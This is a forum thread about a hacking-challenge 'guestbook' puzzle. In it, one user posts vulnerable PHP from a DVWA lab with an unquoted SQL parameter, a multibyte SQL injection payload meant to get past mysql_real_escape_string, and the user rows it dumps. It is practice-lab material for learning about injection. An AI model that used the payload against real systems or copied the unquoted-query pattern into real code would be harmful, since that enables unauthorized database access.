The Guesbook  Gehe zur The Guestbook Challenge

Another game of "spot the error"... Nice distraction with the indentation. ;)

You're not sending the full request to the server.

Try reformatting your code.

line 14

echo $out1

You're a busy clicker

You might also run into problems with checking eof in combination with HTTP/1.1, because the connection isn't closed immediately.

Nice post, tehron.

I can see the error you have spotted now as well, and i actually looked for these myself, but it had to be in the last concat of course, when eyes are lazy.

Cheers!

Hi Gizmore, I am able to bypass the mysql_escape_string() in my simulation lab (based on DVWA), encoding the '\' but can't bypass your guesbook with the same injection...Can you give us some hint?
Thanks in advance.

Maybe give us a hint how to bypass mysql_real_escape_string nowadays

I call "impossibru"!

As I said, in DVWA (mysql 5.5):
Code behind:
$id = trim($_GET['id']);
$id = mysql_real_escape_string($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors

Injection chain ID: 0xc2bf5c27 or 1=1-- - (i.e. ¿\' or 1=1-- -, though also works without the ' (0x27)

Results:
ID: char(0xc2bf5c27) or 1=1-- -
First name: admin
Surname: admin

ID: char(0xc2bf5c27) or 1=1-- -
First name: Gordon
Surname: Brown

ID: char(0xc2bf5c27) or 1=1-- -
First name: Hack
Surname: Me

ID: char(0xc2bf5c27) or 1=1-- -
First name: Pablo
Surname: Picasso

ID: char(0xc2bf5c27) or 1=1-- -
First name: Bob
Surname: Smith

I am a bit confused about this challenge (I also have been considering a cookie injection but..)
Thanks

Maybe you should take a look at the challenge's code